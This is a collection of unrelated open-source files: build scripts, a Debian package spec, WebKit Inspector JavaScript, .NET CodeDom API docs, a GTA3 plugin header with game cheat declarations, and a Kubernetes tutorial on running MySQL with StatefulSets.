# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
PATCHES_DIR = os.path.dirname(os.path.abspath(__file__))
shared_prefix = [
"."
]
shared_prefix_port = [
"..", "..", "..", "..", "FreeRTOS", "Source", "portable", "MSVC-MingW"
]
absolute_prefix = os.path.abspath(os.path.join(PATCHES_DIR, *shared_prefix))
absolute_prefix_port = os.path.abspath(os.path.join(PATCHES_DIR, *shared_prefix_port))
HEADERS = [os.path.join(absolute_prefix, "FreeRTOSConfig.h"),
os.path.join(absolute_prefix, "FreeRTOSIPConfig.h"),
os.path.join(absolute_prefix_port, "portmacro.h")]
| {
"pile_set_name": "Github"
} |
Format: 1.0
Source: megasync
Binary: megasync
Standards-Version: 3.6.1
Architecture: any
Version: MEGASYNC_VERSION
DEBTRANSFORM-RELEASE: 1
Maintainer: MEGA Linux Team <[email protected]>
Homepage: https://mega.nz/#sync
Build-Depends: ffmpeg-mega, pdfium-mega [!i386], libzen-dev, libmediainfo-dev, debhelper, qtbase5-dev, qt5-qmake, qt4-linguist-tools, libqt5dbus5, libqt5svg5-dev, libqt5x11extras5-dev, libcrypto++-dev, libraw-dev, libc-ares-dev, libssl-dev, libsqlite3-dev, zlib1g-dev, wget, dh-autoreconf, cdbs, unzip, wget, libtool-bin (>= 2.4.2-1.10) | libtool (<< 2.4.2-1.10)
Package-List:
megasync deb gnome optional
Files:
00000000000000000000000000000000 0 megasync_MEGASYNC_VERSION.tar.gz
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2011 Google Inc. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are
* met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following disclaimer
* in the documentation and/or other materials provided with the
* distribution.
* * Neither the name of Google Inc. nor the names of its
* contributors may be used to endorse or promote products derived from
* this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
InspectorFrontendAPI = {
_pendingCommands: [],
isDebuggingEnabled: function()
{
return WebInspector.panels.scripts.debuggingEnabled;
},
setDebuggingEnabled: function(enabled)
{
if (enabled) {
WebInspector.panels.scripts.enableDebugging();
WebInspector.inspectorView.setCurrentPanel(WebInspector.panels.scripts);
} else
WebInspector.panels.scripts.disableDebugging();
},
isTimelineProfilingEnabled: function()
{
return WebInspector.panels.timeline.timelineProfilingEnabled;
},
setTimelineProfilingEnabled: function(enabled)
{
WebInspector.panels.timeline.setTimelineProfilingEnabled(enabled);
},
isProfilingJavaScript: function()
{
return WebInspector.CPUProfileType.instance && WebInspector.CPUProfileType.instance.isRecordingProfile();
},
startProfilingJavaScript: function()
{
WebInspector.panels.profiles.enableProfiler();
WebInspector.inspectorView.setCurrentPanel(WebInspector.panels.profiles);
if (WebInspector.CPUProfileType.instance)
WebInspector.CPUProfileType.instance.startRecordingProfile();
},
stopProfilingJavaScript: function()
{
if (WebInspector.CPUProfileType.instance)
WebInspector.CPUProfileType.instance.stopRecordingProfile();
WebInspector.inspectorView.setCurrentPanel(WebInspector.panels.profiles);
},
setAttachedWindow: function(attached)
{
WebInspector.attached = attached;
},
showConsole: function()
{
WebInspector.inspectorView.setCurrentPanel(WebInspector.panels.console);
},
showMainResourceForFrame: function(frameId)
{
// FIXME: Implement this to show the source code for the main resource of a given frame.
},
showResources: function()
{
WebInspector.inspectorView.setCurrentPanel(WebInspector.panels.resources);
},
setDockingUnavailable: function(unavailable)
{
WebInspector.setDockingUnavailable(unavailable);
},
dispatch: function(signature)
{
if (WebInspector.panels) {
var methodName = signature.shift();
return InspectorFrontendAPI[methodName].apply(InspectorFrontendAPI, signature);
}
InspectorFrontendAPI._pendingCommands.push(signature);
},
loadCompleted: function()
{
for (var i = 0; i < InspectorFrontendAPI._pendingCommands.length; ++i)
InspectorFrontendAPI.dispatch(InspectorFrontendAPI._pendingCommands[i]);
InspectorFrontendAPI._pendingCommands = [];
}
}
| {
"pile_set_name": "Github"
} |
os_family = bsd
arch = sparc
arch_model = sparc
os_arch = bsd_sparc
os_arch_model = bsd_sparc
lib_arch = sparc
compiler = gcc
sysdefs = -D_ALLBSD_SOURCE -D_GNU_SOURCE -DSPARC
| {
"pile_set_name": "Github"
} |
/*
* Copyright [2020] [MaxKey of copyright http://www.maxkey.top]
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.maxkey.persistence.service;
import org.apache.mybatis.jpa.persistence.JpaBaseService;
import org.maxkey.domain.Accounts;
import org.maxkey.persistence.mapper.AccountsMapper;
import org.springframework.stereotype.Service;
@Service
public class AccountsService extends JpaBaseService<Accounts>{
public AccountsService() {
super(AccountsMapper.class);
}
/* (non-Javadoc)
* @see com.connsec.db.service.BaseService#getMapper()
*/
@Override
public AccountsMapper getMapper() {
// TODO Auto-generated method stub
return (AccountsMapper)super.getMapper();
}
}
| {
"pile_set_name": "Github"
} |
<Type Name="CodeObjectCreateExpression" FullName="System.CodeDom.CodeObjectCreateExpression">
<TypeSignature Language="C#" Value="public class CodeObjectCreateExpression : System.CodeDom.CodeExpression" />
<TypeSignature Language="ILAsm" Value=".class public auto ansi beforefieldinit CodeObjectCreateExpression extends System.CodeDom.CodeExpression" FrameworkAlternate="dotnet-plat-ext-2.1;dotnet-plat-ext-2.2;dotnet-plat-ext-3.0;dotnet-plat-ext-3.1;dotnet-plat-ext-5.0;net-5.0;netcore-3.0;netcore-3.1" />
<TypeSignature Language="DocId" Value="T:System.CodeDom.CodeObjectCreateExpression" />
<TypeSignature Language="VB.NET" Value="Public Class CodeObjectCreateExpression
Inherits CodeExpression" />
<TypeSignature Language="C++ CLI" Value="public ref class CodeObjectCreateExpression : System::CodeDom::CodeExpression" />
<TypeSignature Language="F#" Value="type CodeObjectCreateExpression = class
 inherit CodeExpression" />
<TypeSignature Language="ILAsm" Value=".class public auto ansi serializable beforefieldinit CodeObjectCreateExpression extends System.CodeDom.CodeExpression" FrameworkAlternate="netframework-1.1;netframework-2.0;netframework-3.0;netframework-3.5;netframework-4.0;netframework-4.5;netframework-4.5.1;netframework-4.5.2;netframework-4.6;netframework-4.6.1;netframework-4.6.2;netframework-4.7;netframework-4.7.1;netframework-4.7.2;netframework-4.8;xamarinmac-3.0" />
<AssemblyInfo>
<AssemblyName>System</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<AssemblyInfo>
<AssemblyName>System.CodeDom</AssemblyName>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.1.0</AssemblyVersion>
<AssemblyVersion>4.0.2.0</AssemblyVersion>
<AssemblyVersion>4.0.3.0</AssemblyVersion>
<AssemblyVersion>5.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Base>
<BaseTypeName>System.CodeDom.CodeExpression</BaseTypeName>
</Base>
<Interfaces />
<Attributes>
<Attribute FrameworkAlternate="netframework-1.1;netframework-2.0;netframework-3.0;netframework-3.5;netframework-4.0;netframework-4.5;netframework-4.5.1;netframework-4.5.2;netframework-4.6;netframework-4.6.1;netframework-4.6.2;netframework-4.7;netframework-4.7.1;netframework-4.7.2;netframework-4.8;xamarinmac-3.0">
<AttributeName Language="C#">[System.Runtime.InteropServices.ClassInterface(System.Runtime.InteropServices.ClassInterfaceType.AutoDispatch)]</AttributeName>
<AttributeName Language="F#">[<System.Runtime.InteropServices.ClassInterface(System.Runtime.InteropServices.ClassInterfaceType.AutoDispatch)>]</AttributeName>
</Attribute>
<Attribute FrameworkAlternate="netframework-1.1;netframework-2.0;netframework-3.0;netframework-3.5;netframework-4.0;netframework-4.5;netframework-4.5.1;netframework-4.5.2;netframework-4.6;netframework-4.6.1;netframework-4.6.2;netframework-4.7;netframework-4.7.1;netframework-4.7.2;netframework-4.8;xamarinmac-3.0">
<AttributeName Language="C#">[System.Runtime.InteropServices.ComVisible(true)]</AttributeName>
<AttributeName Language="F#">[<System.Runtime.InteropServices.ComVisible(true)>]</AttributeName>
</Attribute>
<Attribute FrameworkAlternate="netframework-1.1;netframework-2.0;netframework-3.0;netframework-3.5;netframework-4.0;netframework-4.5;netframework-4.5.1;netframework-4.5.2;netframework-4.6;netframework-4.6.1;netframework-4.6.2;netframework-4.7;netframework-4.7.1;netframework-4.7.2;netframework-4.8;xamarinmac-3.0">
<AttributeName Language="C#">[System.Serializable]</AttributeName>
<AttributeName Language="F#">[<System.Serializable>]</AttributeName>
</Attribute>
</Attributes>
<Docs>
<summary>Represents an expression that creates a new instance of a type.</summary>
<remarks>
<format type="text/markdown"><]
[!code-csharp[CodeMultiExample#5](~/samples/snippets/csharp/VS_Snippets_CLR/CodeMultiExample/CS/codemultiexample.cs#5)]
[!code-vb[CodeMultiExample#5](~/samples/snippets/visualbasic/VS_Snippets_CLR/CodeMultiExample/VB/codemultiexample.vb#5)]
]]></format>
</remarks>
</Docs>
<Members>
<MemberGroup MemberName=".ctor">
<AssemblyInfo>
<AssemblyName>System</AssemblyName>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Docs>
<summary>Initializes a new instance of the <see cref="T:System.CodeDom.CodeObjectCreateExpression" /> class.</summary>
</Docs>
</MemberGroup>
<Member MemberName=".ctor">
<MemberSignature Language="C#" Value="public CodeObjectCreateExpression ();" />
<MemberSignature Language="ILAsm" Value=".method public hidebysig specialname rtspecialname instance void .ctor() cil managed" />
<MemberSignature Language="DocId" Value="M:System.CodeDom.CodeObjectCreateExpression.#ctor" />
<MemberSignature Language="VB.NET" Value="Public Sub New ()" />
<MemberSignature Language="C++ CLI" Value="public:
 CodeObjectCreateExpression();" />
<MemberType>Constructor</MemberType>
<AssemblyInfo>
<AssemblyName>System</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<AssemblyInfo>
<AssemblyName>System.CodeDom</AssemblyName>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.1.0</AssemblyVersion>
<AssemblyVersion>4.0.2.0</AssemblyVersion>
<AssemblyVersion>4.0.3.0</AssemblyVersion>
<AssemblyVersion>5.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Parameters />
<Docs>
<summary>Initializes a new instance of the <see cref="T:System.CodeDom.CodeObjectCreateExpression" /> class.</summary>
<remarks>To be added.</remarks>
</Docs>
</Member>
<Member MemberName=".ctor">
<MemberSignature Language="C#" Value="public CodeObjectCreateExpression (System.CodeDom.CodeTypeReference createType, params System.CodeDom.CodeExpression[] parameters);" />
<MemberSignature Language="ILAsm" Value=".method public hidebysig specialname rtspecialname instance void .ctor(class System.CodeDom.CodeTypeReference createType, class System.CodeDom.CodeExpression[] parameters) cil managed" />
<MemberSignature Language="DocId" Value="M:System.CodeDom.CodeObjectCreateExpression.#ctor(System.CodeDom.CodeTypeReference,System.CodeDom.CodeExpression[])" />
<MemberSignature Language="VB.NET" Value="Public Sub New (createType As CodeTypeReference, ParamArray parameters As CodeExpression())" />
<MemberSignature Language="C++ CLI" Value="public:
 CodeObjectCreateExpression(System::CodeDom::CodeTypeReference ^ createType, ... cli::array <System::CodeDom::CodeExpression ^> ^ parameters);" />
<MemberSignature Language="F#" Value="new System.CodeDom.CodeObjectCreateExpression : System.CodeDom.CodeTypeReference * System.CodeDom.CodeExpression[] -> System.CodeDom.CodeObjectCreateExpression" Usage="new System.CodeDom.CodeObjectCreateExpression (createType, parameters)" />
<MemberType>Constructor</MemberType>
<AssemblyInfo>
<AssemblyName>System</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<AssemblyInfo>
<AssemblyName>System.CodeDom</AssemblyName>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.1.0</AssemblyVersion>
<AssemblyVersion>4.0.2.0</AssemblyVersion>
<AssemblyVersion>4.0.3.0</AssemblyVersion>
<AssemblyVersion>5.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Parameters>
<Parameter Name="createType" Type="System.CodeDom.CodeTypeReference" />
<Parameter Name="parameters" Type="System.CodeDom.CodeExpression[]">
<Attributes>
<Attribute FrameworkAlternate="dotnet-plat-ext-2.1">
<AttributeName Language="C#">[System.ParamArray]</AttributeName>
<AttributeName Language="F#">[<System.ParamArray>]</AttributeName>
</Attribute>
</Attributes>
</Parameter>
</Parameters>
<Docs>
<param name="createType">A <see cref="T:System.CodeDom.CodeTypeReference" /> that indicates the data type of the object to create.</param>
<param name="parameters">An array of <see cref="T:System.CodeDom.CodeExpression" /> objects that indicates the parameters to use to create the object.</param>
<summary>Initializes a new instance of the <see cref="T:System.CodeDom.CodeObjectCreateExpression" /> class using the specified type and parameters.</summary>
<remarks>To be added.</remarks>
<altmember cref="T:System.CodeDom.CodeExpression" />
</Docs>
</Member>
<Member MemberName=".ctor">
<MemberSignature Language="C#" Value="public CodeObjectCreateExpression (string createType, params System.CodeDom.CodeExpression[] parameters);" />
<MemberSignature Language="ILAsm" Value=".method public hidebysig specialname rtspecialname instance void .ctor(string createType, class System.CodeDom.CodeExpression[] parameters) cil managed" />
<MemberSignature Language="DocId" Value="M:System.CodeDom.CodeObjectCreateExpression.#ctor(System.String,System.CodeDom.CodeExpression[])" />
<MemberSignature Language="VB.NET" Value="Public Sub New (createType As String, ParamArray parameters As CodeExpression())" />
<MemberSignature Language="C++ CLI" Value="public:
 CodeObjectCreateExpression(System::String ^ createType, ... cli::array <System::CodeDom::CodeExpression ^> ^ parameters);" />
<MemberSignature Language="F#" Value="new System.CodeDom.CodeObjectCreateExpression : string * System.CodeDom.CodeExpression[] -> System.CodeDom.CodeObjectCreateExpression" Usage="new System.CodeDom.CodeObjectCreateExpression (createType, parameters)" />
<MemberType>Constructor</MemberType>
<AssemblyInfo>
<AssemblyName>System</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<AssemblyInfo>
<AssemblyName>System.CodeDom</AssemblyName>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.1.0</AssemblyVersion>
<AssemblyVersion>4.0.2.0</AssemblyVersion>
<AssemblyVersion>4.0.3.0</AssemblyVersion>
<AssemblyVersion>5.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Parameters>
<Parameter Name="createType" Type="System.String" />
<Parameter Name="parameters" Type="System.CodeDom.CodeExpression[]">
<Attributes>
<Attribute FrameworkAlternate="dotnet-plat-ext-2.1">
<AttributeName Language="C#">[System.ParamArray]</AttributeName>
<AttributeName Language="F#">[<System.ParamArray>]</AttributeName>
</Attribute>
</Attributes>
</Parameter>
</Parameters>
<Docs>
<param name="createType">The name of the data type of object to create.</param>
<param name="parameters">An array of <see cref="T:System.CodeDom.CodeExpression" /> objects that indicates the parameters to use to create the object.</param>
<summary>Initializes a new instance of the <see cref="T:System.CodeDom.CodeObjectCreateExpression" /> class using the specified type and parameters.</summary>
<remarks>To be added.</remarks>
</Docs>
</Member>
<Member MemberName=".ctor">
<MemberSignature Language="C#" Value="public CodeObjectCreateExpression (Type createType, params System.CodeDom.CodeExpression[] parameters);" />
<MemberSignature Language="ILAsm" Value=".method public hidebysig specialname rtspecialname instance void .ctor(class System.Type createType, class System.CodeDom.CodeExpression[] parameters) cil managed" />
<MemberSignature Language="DocId" Value="M:System.CodeDom.CodeObjectCreateExpression.#ctor(System.Type,System.CodeDom.CodeExpression[])" />
<MemberSignature Language="VB.NET" Value="Public Sub New (createType As Type, ParamArray parameters As CodeExpression())" />
<MemberSignature Language="C++ CLI" Value="public:
 CodeObjectCreateExpression(Type ^ createType, ... cli::array <System::CodeDom::CodeExpression ^> ^ parameters);" />
<MemberSignature Language="F#" Value="new System.CodeDom.CodeObjectCreateExpression : Type * System.CodeDom.CodeExpression[] -> System.CodeDom.CodeObjectCreateExpression" Usage="new System.CodeDom.CodeObjectCreateExpression (createType, parameters)" />
<MemberType>Constructor</MemberType>
<AssemblyInfo>
<AssemblyName>System</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<AssemblyInfo>
<AssemblyName>System.CodeDom</AssemblyName>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.1.0</AssemblyVersion>
<AssemblyVersion>4.0.2.0</AssemblyVersion>
<AssemblyVersion>4.0.3.0</AssemblyVersion>
<AssemblyVersion>5.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Parameters>
<Parameter Name="createType" Type="System.Type" />
<Parameter Name="parameters" Type="System.CodeDom.CodeExpression[]">
<Attributes>
<Attribute FrameworkAlternate="dotnet-plat-ext-2.1">
<AttributeName Language="C#">[System.ParamArray]</AttributeName>
<AttributeName Language="F#">[<System.ParamArray>]</AttributeName>
</Attribute>
</Attributes>
</Parameter>
</Parameters>
<Docs>
<param name="createType">The data type of the object to create.</param>
<param name="parameters">An array of <see cref="T:System.CodeDom.CodeExpression" /> objects that indicates the parameters to use to create the object.</param>
<summary>Initializes a new instance of the <see cref="T:System.CodeDom.CodeObjectCreateExpression" /> class using the specified type and parameters.</summary>
<remarks>To be added.</remarks>
</Docs>
</Member>
<Member MemberName="CreateType">
<MemberSignature Language="C#" Value="public System.CodeDom.CodeTypeReference CreateType { get; set; }" />
<MemberSignature Language="ILAsm" Value=".property instance class System.CodeDom.CodeTypeReference CreateType" />
<MemberSignature Language="DocId" Value="P:System.CodeDom.CodeObjectCreateExpression.CreateType" />
<MemberSignature Language="VB.NET" Value="Public Property CreateType As CodeTypeReference" />
<MemberSignature Language="C++ CLI" Value="public:
 property System::CodeDom::CodeTypeReference ^ CreateType { System::CodeDom::CodeTypeReference ^ get(); void set(System::CodeDom::CodeTypeReference ^ value); };" />
<MemberSignature Language="F#" Value="member this.CreateType : System.CodeDom.CodeTypeReference with get, set" Usage="System.CodeDom.CodeObjectCreateExpression.CreateType" />
<MemberType>Property</MemberType>
<AssemblyInfo>
<AssemblyName>System</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<AssemblyInfo>
<AssemblyName>System.CodeDom</AssemblyName>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.1.0</AssemblyVersion>
<AssemblyVersion>4.0.2.0</AssemblyVersion>
<AssemblyVersion>4.0.3.0</AssemblyVersion>
<AssemblyVersion>5.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Attributes>
<Attribute FrameworkAlternate="netframework-4.0">
<AttributeName Language="C#">[set: System.Runtime.TargetedPatchingOptOut("Performance critical to inline this type of method across NGen image boundaries")]</AttributeName>
<AttributeName Language="F#">[<set: System.Runtime.TargetedPatchingOptOut("Performance critical to inline this type of method across NGen image boundaries")>]</AttributeName>
</Attribute>
</Attributes>
<ReturnValue>
<ReturnType>System.CodeDom.CodeTypeReference</ReturnType>
</ReturnValue>
<Docs>
<summary>Gets or sets the data type of the object to create.</summary>
<value>A <see cref="T:System.CodeDom.CodeTypeReference" /> to the data type of the object to create.</value>
<remarks>To be added.</remarks>
</Docs>
</Member>
<Member MemberName="Parameters">
<MemberSignature Language="C#" Value="public System.CodeDom.CodeExpressionCollection Parameters { get; }" />
<MemberSignature Language="ILAsm" Value=".property instance class System.CodeDom.CodeExpressionCollection Parameters" />
<MemberSignature Language="DocId" Value="P:System.CodeDom.CodeObjectCreateExpression.Parameters" />
<MemberSignature Language="VB.NET" Value="Public ReadOnly Property Parameters As CodeExpressionCollection" />
<MemberSignature Language="C++ CLI" Value="public:
 property System::CodeDom::CodeExpressionCollection ^ Parameters { System::CodeDom::CodeExpressionCollection ^ get(); };" />
<MemberSignature Language="F#" Value="member this.Parameters : System.CodeDom.CodeExpressionCollection" Usage="System.CodeDom.CodeObjectCreateExpression.Parameters" />
<MemberType>Property</MemberType>
<AssemblyInfo>
<AssemblyName>System</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<AssemblyInfo>
<AssemblyName>System.CodeDom</AssemblyName>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.1.0</AssemblyVersion>
<AssemblyVersion>4.0.2.0</AssemblyVersion>
<AssemblyVersion>4.0.3.0</AssemblyVersion>
<AssemblyVersion>5.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Attributes>
<Attribute FrameworkAlternate="netframework-4.0">
<AttributeName Language="C#">[get: System.Runtime.TargetedPatchingOptOut("Performance critical to inline this type of method across NGen image boundaries")]</AttributeName>
<AttributeName Language="F#">[<get: System.Runtime.TargetedPatchingOptOut("Performance critical to inline this type of method across NGen image boundaries")>]</AttributeName>
</Attribute>
</Attributes>
<ReturnValue>
<ReturnType>System.CodeDom.CodeExpressionCollection</ReturnType>
</ReturnValue>
<Docs>
<summary>Gets or sets the parameters to use in creating the object.</summary>
<value>A <see cref="T:System.CodeDom.CodeExpressionCollection" /> that indicates the parameters to use when creating the object.</value>
<remarks>To be added.</remarks>
<altmember cref="T:System.CodeDom.CodeExpressionCollection" />
</Docs>
</Member>
</Members>
</Type>
| {
"pile_set_name": "Github"
} |
/*
Plugin-SDK (Grand Theft Auto 3) header file
Authors: GTA Community. See more here
https://github.com/DK22Pac/plugin-sdk
Do not delete this comment block. Respect others' work!
*/
#pragma once
#include "PluginBase.h"
SUPPORTED_10EN_11EN_STEAM void WeaponCheat();
SUPPORTED_10EN_11EN_STEAM void HealthCheat();
SUPPORTED_10EN_11EN_STEAM void TankCheat();
SUPPORTED_10EN_11EN_STEAM void BlowUpCarsCheat();
SUPPORTED_10EN_11EN_STEAM void ChangePlayerCheat();
SUPPORTED_10EN_11EN_STEAM void MayhemCheat();
SUPPORTED_10EN_11EN_STEAM void EverybodyAttacksPlayerCheat();
SUPPORTED_10EN_11EN_STEAM void WeaponsForAllCheat();
SUPPORTED_10EN_11EN_STEAM void FastTimeCheat();
SUPPORTED_10EN_11EN_STEAM void SlowTimeCheat();
SUPPORTED_10EN_11EN_STEAM void MoneyCheat();
SUPPORTED_10EN_11EN_STEAM void ArmourCheat();
SUPPORTED_10EN_11EN_STEAM void WantedLevelUpCheat();
SUPPORTED_10EN_11EN_STEAM void WantedLevelDownCheat();
SUPPORTED_10EN_11EN_STEAM void SunnyWeatherCheat();
SUPPORTED_10EN_11EN_STEAM void CloudyWeatherCheat();
SUPPORTED_10EN_11EN_STEAM void RainyWeatherCheat();
SUPPORTED_10EN_11EN_STEAM void FoggyWeatherCheat();
SUPPORTED_10EN_11EN_STEAM void FastWeatherCheat();
SUPPORTED_10EN_11EN_STEAM void OnlyRenderWheelsCheat();
SUPPORTED_10EN_11EN_STEAM void ChittyChittyBangBangCheat();
SUPPORTED_10EN_11EN_STEAM void StrongGripCheat();
SUPPORTED_10EN_11EN_STEAM void NastyLimbsCheat();
#include "meta/meta.CCheat.h"
| {
"pile_set_name": "Github"
} |
// TR1 stdarg.h -*- C++ -*-
// Copyright (C) 2006-2013 Free Software Foundation, Inc.
//
// This file is part of the GNU ISO C++ Library. This library is free
// software; you can redistribute it and/or modify it under the
// terms of the GNU General Public License as published by the
// Free Software Foundation; either version 3, or (at your option)
// any later version.
// This library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// Under Section 7 of GPL version 3, you are granted additional
// permissions described in the GCC Runtime Library Exception, version
// 3.1, as published by the Free Software Foundation.
// You should have received a copy of the GNU General Public License and
// a copy of the GCC Runtime Library Exception along with this program;
// see the files COPYING3 and COPYING.RUNTIME respectively. If not, see
// <http://www.gnu.org/licenses/>.
/** @file tr1/stdarg.h
* This is a TR1 C++ Library header.
*/
#ifndef _TR1_STDARG_H
#define _TR1_STDARG_H 1
#include <tr1/cstdarg>
#endif
| {
"pile_set_name": "Github"
} |
# Primitive.PrepareOptions.LineCover property
Corresponds to command line option `--linecover`
```csharp
public bool LineCover { get; }
```
## See Also
* class [PrepareOptions](../Primitive.PrepareOptions-apidoc)
* namespace [AltCover](../../AltCover-apidoc)
<!-- DO NOT EDIT: generated by xmldocmd for AltCover.exe -->
| {
"pile_set_name": "Github"
} |
= Kubernetes Stateful Containers using StatefulSets and Persistent Volumes
:toc:
:icons:
:linkcss:
:imagesdir: ../../resources/images
In this section, we will review how to launch and manage applications using https://kubernetes.io/docs/concepts/abstractions/controllers/statefulsets/[StatefulSets] and https://kubernetes.io/docs/concepts/storage/persistent-volumes/[Persistent Volumes].
We will review how to deploy MySQL database using StatefulSets and EBS volumes. The example is a MySQL single-master topology with multiple slaves running asynchronous replication.
The example consists of ConfigMap, two MySQL services and a StatefulSet. We will deploy MySQL database,
send some traffic to test connection status, go through few failure modes and review resiliency that
is built into the StatefulSet. Lastly, we'll demonstrate how to use scale options with StatefulSet.
== Prerequisites
In order to perform exercises in this chapter, you’ll need to deploy configurations to a Kubernetes cluster. To create an EKS-based Kubernetes cluster, use the link:../../01-path-basics/102-your-first-cluster#create-a-kubernetes-cluster-with-eks[AWS CLI] (recommended). If you wish to create a Kubernetes cluster without EKS, you can instead use link:../../01-path-basics/102-your-first-cluster#alternative-create-a-kubernetes-cluster-with-kops[kops].
All configuration files for this chapter are in the `statefulsets` directory. Make sure you change to that directory before giving any commands in this chapter.
== Create ConfigMap
Using ConfigMap, you can independently control MySQL configuration. The ConfigMap looks like as shown:
```
apiVersion: v1
kind: ConfigMap
metadata:
name: mysql-config
labels:
app: mysql
data:
master.cnf: |
# Apply this config only on the master.
[mysqld]
log-bin
slave.cnf: |
# Apply this config only on slaves.
[mysqld]
super-read-only
```
In this case, we are using master to serve replication logs to slave and slaves are read-only. Create the ConfigMap using the command shown:
$ kubectl create -f templates/mysql-configmap.yaml
configmap "mysql-config" created
== Create Services
Create two headless services using the following configuration:
```
# Headless service for stable DNS entries of StatefulSet members.
apiVersion: v1
kind: Service
metadata:
name: mysql
labels:
app: mysql
spec:
ports:
- name: mysql
port: 3306
clusterIP: None
selector:
app: mysql
---
# Client service for connecting to any MySQL instance for reads.
# For writes, you must instead connect to the master: mysql-0.mysql.
apiVersion: v1
kind: Service
metadata:
name: mysql-read
labels:
app: mysql
spec:
ports:
- name: mysql
port: 3306
selector:
app: mysql
```
The `mysql` service is used for DNS resolution so that when pods are placed by StatefulSet controller, pods can be resolved using `<pod-name>.mysql`. `mysql-read` is a client service that does load balancing for all slaves.
$ kubectl create -f templates/mysql-services.yaml
service "mysql" created
service "mysql-read" created
Only read queries can use the load-balanced `mysql-read` service. Because there is only one MySQL master, clients should connect directly to the MySQL master Pod, identified by `mysql-0.mysql`, to execute writes.
== Create StatefulSet
Finally, we create StatefulSet using the configuration in `templates/mysql-statefulset.yaml` using the command shown:
$ kubectl create -f templates/mysql-statefulset.yaml
statefulset "mysql" created
$ kubectl get -w statefulset
NAME DESIRED CURRENT AGE
mysql 3 1 8s
mysql 3 2 59s
